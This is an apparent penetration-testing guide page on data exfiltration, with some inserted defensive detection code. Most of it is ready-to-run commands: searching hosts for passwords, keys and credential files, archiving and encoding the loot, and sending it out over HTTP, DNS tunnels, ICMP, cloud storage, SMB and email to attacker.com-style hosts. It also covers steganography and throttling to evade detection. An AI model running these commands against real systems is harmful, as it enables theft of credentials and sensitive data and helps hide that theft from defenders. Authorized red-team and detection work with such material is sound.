Data Exfiltration
Data exfiltration demonstrates the real-world impact of a breach by extracting sensitive information. This phase validates access and shows stakeholders what an attacker could steal.
Warning
Only exfiltrate data with explicit authorization. Document what data you access and handle all data according to the Rules of Engagement. Never exfiltrate real PII/PHI unless specifically required.
```mermaid
flowchart LR
    A[Data Discovery] --> B[Collection]
    B --> C[Staging]
    C --> D[Exfiltration]
    D --> E[Evidence]
    subgraph Methods
        D --> D1[HTTP/S]
        D --> D2[DNS]
        D --> D3[ICMP]
        D --> D4[Cloud]
    end
    style A fill:#00ff00,stroke:#000,color:#000
    style E fill:#a855f7,stroke:#000,color:#000
```
Data Discovery
Windows File Search
```powershell
# Search for sensitive files (cmd.exe syntax)
dir /s /b C:\*password*.txt C:\*password*.xlsx C:\*credential* 2>nul
dir /s /b C:\*.kdbx C:\*.key C:\*.pem C:\*.pfx 2>nul
# PowerShell search
Get-ChildItem -Path C:\ -Recurse -Include *password*,*credential*,*secret* -ErrorAction SilentlyContinue
# Search file contents (cmd.exe findstr; space-separated terms are OR'ed, "\|" would match a literal pipe)
findstr /s /i /m "password" C:\Users\*.txt
findstr /s /i /m "api_key secret token" C:\Users\*.config
# PowerShell content search
Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.xml,*.config | Select-String -Pattern "password","secret","key" | Select-Object Path,LineNumber,Line
```

Linux File Search
```bash
# Find sensitive files
find / -name "*.conf" -o -name "*.config" -o -name "*password*" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
find /home -name ".bash_history" -o -name ".mysql_history" 2>/dev/null
# Search file contents
grep -r "password" /etc/ 2>/dev/null
grep -r "password\|secret\|api_key" /var/www/ 2>/dev/null
# Find recent files (group the -o alternatives so -type and -mtime apply to both)
find / -type f -mtime -7 \( -name "*.xlsx" -o -name "*.docx" \) 2>/dev/null
```

Network Share Discovery
```powershell
# Enumerate shares
net view \\server
net share
# PowerView
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile
# CrackMapExec
cme smb 10.10.10.0/24 -u user -p pass --shares
cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
# Search for interesting files on shares
smbclient //server/share -U user%pass -c 'recurse;ls'
```

Database Discovery
```powershell
# MySQL
mysql -u root -p -e "SHOW DATABASES;"
mysqldump -u root -p database_name > dump.sql
# MSSQL
sqlcmd -S localhost -U sa -P password -Q "SELECT name FROM sys.databases"
sqlcmd -S localhost -U sa -P password -Q "SELECT * FROM sensitive_table" -o output.csv
# PowerUpSQL
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLInstanceDomain | Get-SQLDatabase
# Extract from web configs
findstr /s /i "connectionstring" C:\inetpub\*.config
```

Data Collection & Staging
Archiving Data
```powershell
# Windows - Compress for exfil
Compress-Archive -Path C:\Loot\* -DestinationPath C:\Temp\data.zip
# With password (7-Zip)
7z a -p"password" -mhe=on data.7z C:\Loot\*
# Linux
tar -czvf data.tar.gz /path/to/files
zip -r -e data.zip /path/to/files
# Split large files
split -b 50M data.tar.gz data_part_
```

Encoding/Encryption
```bash
# Base64 encode
# Windows
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data.zip")) > encoded.txt
certutil -encode data.zip encoded.txt
# Linux
base64 data.tar.gz > encoded.txt
cat data.tar.gz | gzip | base64
# Encrypt with OpenSSL (-pbkdf2 replaces the deprecated default key derivation)
openssl enc -aes-256-cbc -salt -pbkdf2 -in data.tar.gz -out data.enc -k password
# GPG encryption
gpg -c --cipher-algo AES256 data.tar.gz
```

Exfiltration Methods
HTTP/HTTPS
```bash
# Simple HTTP POST
curl -X POST -F "file=@data.zip" https://attacker.com/upload
# PowerShell
$bytes = [IO.File]::ReadAllBytes("C:\data.zip")
Invoke-WebRequest -Uri "https://attacker.com/upload" -Method POST -Body $bytes
# Python HTTP server (receiver)
python3 -m http.server 8080 # For downloads
# For uploads use custom script or tools like updog
# wget POST
wget --post-file=data.zip https://attacker.com/upload
```

DNS Exfiltration
Information
DNS exfiltration is slow but often bypasses egress filtering. Useful when HTTP/HTTPS is blocked.
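The defender's view of this channel, as an added example that is not part of this page: it scores the leftmost label of every query for length and entropy (an encoded chunk looks nothing like a hostname) and counts how many distinct names one client resolves under a single parent domain. The log format, the thresholds, and the two-label parent-domain rule are assumptions; the log lines are constructed.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log, one "<timestamp> <client> <qname>" per line. The four long
# labels under exfil.attacker.com stand in for encoded chunks sent one query at a time.
SAMPLE_LOG = """\
2024-01-15T10:30:01 10.10.10.5 www.example.com
2024-01-15T10:30:02 10.10.10.5 mail.example.com
2024-01-15T10:30:03 10.10.10.7 q7Xb2LmN9vPk4RtY1wZs8HjF3dGc5AeU6oIiKlMnOpQrStUv.exfil.attacker.com
2024-01-15T10:30:03 10.10.10.7 Zk3mP8qW1xRt5yUv9bNh2cJg6dLf4sAe7oKi0lMnQpSrTuVw.exfil.attacker.com
2024-01-15T10:30:04 10.10.10.7 r5TgY8hUj2KlO9pA3sDf6GhJ1kLz4XcV7bNm0QwE5rTy8uIo.exfil.attacker.com
2024-01-15T10:30:05 10.10.10.7 M2nB5vC8xZ1aS4dF7gH0jK3lQ6wE9rT2yU5iO8pL1zX4cV7b.exfil.attacker.com
2024-01-15T10:30:06 10.10.10.9 cdn.example.net
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(s):
    """Bits per character; encoded data scores high, ordinary hostnames score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def parent_domain(qname):
    # Assumption: the registrable domain is the last two labels (no public-suffix list).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze_dns_log(log_text, max_label=30, min_entropy=3.5, min_unique=3):
    """Return per-query and per-domain indicators of subdomain-encoded exfiltration."""
    unique_subs = defaultdict(set)   # (client, parent domain) -> distinct names queried
    suspicious = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, qname = m.groups()
        first_label = qname.split(".")[0]
        # Indicator 1: a long, high-entropy leftmost label looks like an encoded chunk.
        if len(first_label) >= max_label and shannon_entropy(first_label) >= min_entropy:
            suspicious.append((client, qname))
        unique_subs[(client, parent_domain(qname))].add(qname)
    # Indicator 2: one client resolving many never-repeated names under one domain.
    bursty = {k: len(v) for k, v in unique_subs.items() if len(v) >= min_unique}
    return {"suspicious_queries": suspicious, "bursty_domains": bursty}
```

Indicator 2 is the one that also catches tunnels such as dnscat2 and iodine, whose labels are shorter but whose name churn is constant.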
```bash
# DNScat2 Server
dnscat2-server attacker.com
# DNScat2 Client (on target)
./dnscat attacker.com
# Manual DNS exfil (encode data in subdomains)
# Max ~63 chars per label, ~253 total
# Base64 encode and chunk
for chunk in $(cat data.b64 | fold -w50); do
    nslookup $chunk.exfil.attacker.com
done
# Iodine (DNS tunnel)
# Server
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
iodine -f -P password tunnel.attacker.com
```

ICMP Exfiltration
```bash
# ptunnel (ICMP tunnel)
# Server
ptunnel-ng -s
# Client
ptunnel-ng -p proxy_ip -l 8000 -r attacker.com -R 22
# Manual ICMP exfil (PowerShell)
$ping = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("secretdata")
$ping.Send("attacker_ip", 1000, $data)
```
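What a network sensor can check for on this channel, as an added example that is not part of this page: a stock ping utility always sends the same filler bytes, while the .NET Ping.Send call above transmits whatever buffer the caller supplies, so any echo request whose payload is not a known filler, is oversized, or is mostly printable text deserves a look. The records are constructed and the 64-byte and 90% thresholds are assumptions.

```python
import string

# Filler bytes sent by common ping utilities (facts about the tools, not page code).
WINDOWS_FILLER = b"abcdefghijklmnopqrstuvwabcdefghi"   # ping.exe default, 32 bytes
LINUX_FILLER = bytes(range(8, 56))                     # iputils: offsets 8..55 hold their own index

# Constructed echo-request records: (source, payload). The third mimics the .NET
# Ping.Send call above; the fourth is a constructed 1000-byte blob standing in for
# a chunk of an archive pushed through the same call.
SAMPLE_ECHOES = [
    ("10.10.10.5", WINDOWS_FILLER),
    ("10.10.10.6", b"\x65\xa4\x1e\x00\x12\x34\x56\x78" + LINUX_FILLER),  # timestamp + filler
    ("10.10.10.7", b"secretdata"),
    ("10.10.10.7", b"PK\x03\x04" + bytes(i % 256 for i in range(996))),
]


def is_default_filler(payload):
    """True when the payload is exactly what a stock ping would send."""
    if payload == WINDOWS_FILLER:
        return True
    return len(payload) == 56 and payload[8:] == LINUX_FILLER


def printable_ratio(payload):
    printable = set(string.printable.encode())
    return sum(b in printable for b in payload) / len(payload) if payload else 0.0


def classify_echo(payload, max_normal_len=64):
    """Reason string if the payload deviates from normal ping traffic, else None."""
    if is_default_filler(payload):
        return None
    if len(payload) > max_normal_len:
        return "oversized payload (%d bytes)" % len(payload)
    if printable_ratio(payload) > 0.9:
        return "non-default printable payload"
    return "non-default binary payload"


def scan_echoes(records):
    """(source, payload length, reason) for every echo request worth a closer look."""
    alerts = []
    for src, payload in records:
        reason = classify_echo(payload)
        if reason is not None:
            alerts.append((src, len(payload), reason))
    return alerts
```

ptunnel traffic trips the same checks, since its payloads are neither filler nor ping-sized.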
Cloud Storage
```bash
# AWS S3
aws s3 cp data.zip s3://exfil-bucket/
# Azure Blob
az storage blob upload --container-name exfil --file data.zip --name data.zip
# Rclone (supports many providers)
rclone copy data.zip remote:exfil/
# Google Drive (using gdrive)
gdrive upload data.zip
```

SMB/WebDAV
```powershell
# Copy to SMB share
copy data.zip \\attacker\share\
xcopy /s C:\Loot \\attacker\share\Loot
# Mount WebDAV and copy
net use Z: https://attacker.com/webdav /user:user pass
copy data.zip Z:\
# Linux SMB
smbclient //attacker/share -U user -c 'put data.zip'
```

```powershell
# PowerShell SMTP
$smtp = New-Object Net.Mail.SmtpClient("smtp.company.com")
$msg = New-Object Net.Mail.MailMessage
$msg.From = "user@company.com"
$msg.To.Add("attacker@external.com")
$msg.Subject = "Report"
$attachment = New-Object Net.Mail.Attachment("C:\data.zip")
$msg.Attachments.Add($attachment)
$smtp.Send($msg)
# swaks (command line)
swaks --to attacker@external.com --from user@company.com --server smtp.company.com --attach data.zip
```

Covert Channels
Steganography
```bash
# Hide data in images
steghide embed -cf image.jpg -ef secret.txt
# Extract
steghide extract -sf image.jpg
# OpenStego
openstego embed -mf secret.txt -cf cover.png -sf output.png
```

Alternate Data Streams (Windows)
```powershell
# Hide file in ADS (cmd.exe syntax)
type secret.txt > innocent.txt:hidden
# Read from ADS
more < innocent.txt:hidden
# List ADS
dir /r
Get-Item -Path innocent.txt -Stream *
```

Exfiltration Tools
PacketWhisper
```bash
# DNS-based exfiltration using random DNS queries
# Evades signature detection by using real DNS lookups
# Transmit
python3 packetWhisper.py
# Select cipher, payload, and DNS server options
```

DET (Data Exfiltration Toolkit)
```bash
# Supports multiple protocols: HTTP, DNS, ICMP, SMTP, Slack, etc.
# Server
python det.py -c config.json -L
# Client (send file)
python det.py -c config.json -f secret.zip
```

Cloakify
```bash
# Transform data to look like lists (IPs, words, etc.)
python cloakify.py secret.zip ciphers/pokemonNames > pokemon.txt
# Decloakify
python decloakify.py pokemon.txt ciphers/pokemonNames
```

Bandwidth Considerations
```bash
# Throttle exfiltration to avoid detection
# Split and delay transfers
# Linux - rate limit
rsync --bwlimit=100 data.tar.gz attacker:/exfil/
# Windows PowerShell - chunked transfer
$chunkSize = 1MB
$file = [IO.File]::OpenRead("C:\data.zip")
$buffer = New-Object byte[] $chunkSize
while (($read = $file.Read($buffer, 0, $chunkSize)) -gt 0) {
    # Send chunk
    Start-Sleep -Seconds 30 # Delay between chunks
}
$file.Close()
# curl rate limit
curl --limit-rate 100K -F "file=@data.zip" https://attacker.com/upload
```
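Why throttling works against naive monitoring, and what catches it anyway, as an added example that is not part of this page: a per-transfer size threshold never fires on 1 MB chunks spaced 30 seconds apart, while a sliding-window total per source/destination pair does. The flow records are constructed (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges) and the 10 MB, 50 MB and one-hour parameters are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed outbound flow records: (timestamp, src, dst, bytes). The first set mimics the
# chunked PowerShell loop above: 1 MB every 30 s to one external host, so no single record
# is large. The second set is ordinary low-volume traffic from another host.
T0 = datetime(2024, 1, 15, 10, 30)
SAMPLE_FLOWS = [(T0 + timedelta(seconds=30 * i), "10.10.10.7", "203.0.113.10", 2**20)
                for i in range(120)]
SAMPLE_FLOWS += [(T0 + timedelta(minutes=10 * i), "10.10.10.5", "198.51.100.20", 200_000)
                 for i in range(5)]


def peak_window_bytes(flows, window=timedelta(hours=1)):
    """Per (src, dst), the largest number of bytes sent within any window of the given length."""
    by_pair = defaultdict(list)
    for ts, src, dst, nbytes in flows:
        by_pair[(src, dst)].append((ts, nbytes))
    peaks = {}
    for pair, recs in by_pair.items():
        recs.sort()
        total = start = peak = 0
        for ts, nbytes in recs:
            total += nbytes
            # Evict records that fell out of the window ending at ts.
            while ts - recs[start][0] > window:
                total -= recs[start][1]
                start += 1
            peak = max(peak, total)
        peaks[pair] = peak
    return peaks


def detect_low_and_slow(flows, per_record_limit=10 * 2**20, cumulative_limit=50 * 2**20):
    """Compare a naive per-transfer threshold with a cumulative per-destination one."""
    per_record = [f for f in flows if f[3] > per_record_limit]
    cumulative = {pair: peak for pair, peak in peak_window_bytes(flows).items()
                  if peak > cumulative_limit}
    return {"per_record_alerts": per_record, "cumulative_alerts": cumulative}
```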
Documentation Template
```text
# Data Exfiltration Log
| Timestamp | Source System | Data Type | Size | Method | Destination |
|-----------|---------------|-----------|------|--------|-------------|
| 2024-01-15 10:30 | DC01 | NTDS.dit | 500MB | HTTPS | C2 Server |
| 2024-01-15 11:45 | FILESERV | Financials | 2GB | SMB | Attack Box |
| 2024-01-15 14:00 | SQLSRV | DB Dump | 100MB | DNS | Exfil Server |
# Important: Document but DO NOT keep actual sensitive data
# Screenshots and logs as proof, delete actual data
```

Danger
Delete all exfiltrated data after documentation. Never retain client PII, PHI, financial data, or other sensitive information beyond engagement requirements.